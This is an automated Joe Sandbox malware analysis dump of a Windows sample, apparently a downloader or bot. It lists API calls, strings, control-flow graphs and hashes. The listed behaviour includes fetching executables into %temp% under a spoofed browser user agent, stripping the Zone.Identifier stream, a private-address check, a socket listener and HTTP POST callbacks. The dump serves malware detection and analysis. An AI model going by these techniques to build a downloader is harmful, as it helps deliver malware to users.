                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID:
                                                                                • API String ID: 542301482-0
                                                                                • Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                                • Instruction ID: d63025b72d2c6ebaad53fa266f334e56fbfbf26be99018a77b0022b5cf711e38
                                                                                • Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                                • Instruction Fuzzy Hash: 5FE0C97490120CBFDB40DF90C889B9EBBB8AB08315F1081A9E90467280D7B96A948BA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 90bc740f41516614e506d1ac5d80d669bcd439495ae7d3b12d326e627af75817
                                                                                • Instruction ID: 36ccf00cb4992cb664799e326c06744a6ce95946d15b2f63e00e690a3ab10e8b
                                                                                • Opcode Fuzzy Hash: 90bc740f41516614e506d1ac5d80d669bcd439495ae7d3b12d326e627af75817
                                                                                • Instruction Fuzzy Hash: CB128CB4D002199FCB48CF99D991AAEFBB2BF88300F24856AE415BB355D734AA11CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                • Instruction ID: fc58f75cabc9a556b6370791a68136b0cd82658c142e2e8a3fcd10fa8d82b043
                                                                                • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                • Instruction Fuzzy Hash: B921B872900204AFC720DF69C8C09A7B7A5FF45360B468179ED55AB686D734F919C7E0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNEL32 ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F2F9
                                                                                Strings
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: 9d19446c57baec265813862518ad0f12c05837928c3285fbca672de22a95f4da
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: 9d19446c57baec265813862518ad0f12c05837928c3285fbca672de22a95f4da
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 500 40b350-40b367 call 40b280 503 40b369 500->503 504 40b36e-40b38a call 40aed0 strcmp 500->504 505 40b5f5-40b5f8 503->505 508 40b391-40b3ad call 40aed0 strstr 504->508 509 40b38c 504->509 512 40b3f0-40b40c call 40aed0 strstr 508->512 513 40b3af-40b3cb call 40aed0 strstr 508->513 509->505 520 40b40e-40b42a call 40aed0 strstr 512->520 521 40b44f-40b46b call 40aed0 strstr 512->521 518 40b3eb 513->518 519 40b3cd-40b3e9 call 40aed0 strstr 513->519 518->505 519->512 519->518 530 40b44a 520->530 531 40b42c-40b448 call 40aed0 strstr 520->531 528 40b46d-40b489 call 40aed0 strstr 521->528 529 40b4ae-40b4c4 EnterCriticalSection 521->529 542 40b4a9 528->542 543 40b48b-40b4a7 call 40aed0 strstr 528->543 533 40b4cf-40b4d8 529->533 530->505 531->521 531->530 537 40b509-40b514 call 40b600 533->537 538 40b4da-40b4ea 533->538 549 40b5ea-40b5ef LeaveCriticalSection 537->549 550 40b51a-40b528 537->550 539 40b507 538->539 540 40b4ec-40b505 call 40d950 538->540 539->533 540->537 542->505 543->529 543->542 549->505 552 40b52a 550->552 553 40b52e-40b53f call 40a240 550->553 552->553 553->549 556 40b545-40b562 call 40d950 553->556 559 40b564-40b574 556->559 560 40b5ba-40b5d2 556->560 561 40b580-40b5b8 call 40a660 559->561 562 40b576-40b57e Sleep 559->562 563 40b5d8-40b5e3 call 40b600 560->563 561->563 562->559 563->549 568 40b5e5 call 40b030 563->568 568->549
                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 570 401920-401947 GetTickCount WaitForSingleObject 571 401ac9-401acf 570->571 572 40194d-401964 WSAWaitForMultipleEvents 570->572 573 4019f0-401a03 GetTickCount 572->573 574 40196a-401981 WSAEnumNetworkEvents 572->574 575 401a43-401a4c GetTickCount 573->575 576 401a05-401a14 EnterCriticalSection 573->576 574->573 577 401983-401988 574->577 581 401ab5-401ac3 WaitForSingleObject 575->581 582 401a4e-401a5d EnterCriticalSection 575->582 578 401a16-401a1d 576->578 579 401a3a-401a41 LeaveCriticalSection 576->579 577->573 580 40198a-401990 577->580 583 401a35 call 401820 578->583 584 401a1f-401a27 578->584 579->581 580->573 585 401992-4019b1 accept 580->585 581->571 581->572 586 401aa1-401ab1 LeaveCriticalSection GetTickCount 582->586 587 401a5f-401a77 InterlockedExchangeAdd call 40d950 582->587 583->579 584->578 588 401a29-401a30 LeaveCriticalSection 584->588 585->573 590 4019b3-4019c2 call 4022c0 585->590 586->581 594 401a97-401a9f 587->594 595 401a79-401a82 587->595 588->581 590->573 598 4019c4-4019df call 401740 590->598 594->586 594->587 595->594 597 401a84-401a8d call 40aff0 595->597 597->594 598->573 603 4019e1-4019e7 598->603 603->573 604 4019e9-4019eb call 401cf0 603->604 604->573
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 719 40e070-40e10b memset InternetCrackUrlA InternetOpenA 720 40e111-40e144 InternetConnectA 719->720 721 40e287-40e290 719->721 722 40e27a-40e281 InternetCloseHandle 720->722 723 40e14a-40e17a HttpOpenRequestA 720->723 722->721 724 40e180-40e197 HttpSendRequestA 723->724 725 40e26d-40e274 InternetCloseHandle 723->725 726 40e260-40e267 InternetCloseHandle 724->726 727 40e19d-40e1a1 724->727 725->722 726->725 728 40e256 727->728 729 40e1a7 727->729 728->726 730 40e1b1-40e1b8 729->730 731 40e249-40e254 730->731 732 40e1be-40e1e0 InternetReadFile 730->732 731->726 733 40e1e2-40e1e9 732->733 734 40e1eb 732->734 733->734 735 40e1ed-40e244 call 40a490 memcpy 733->735 734->731 735->730
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
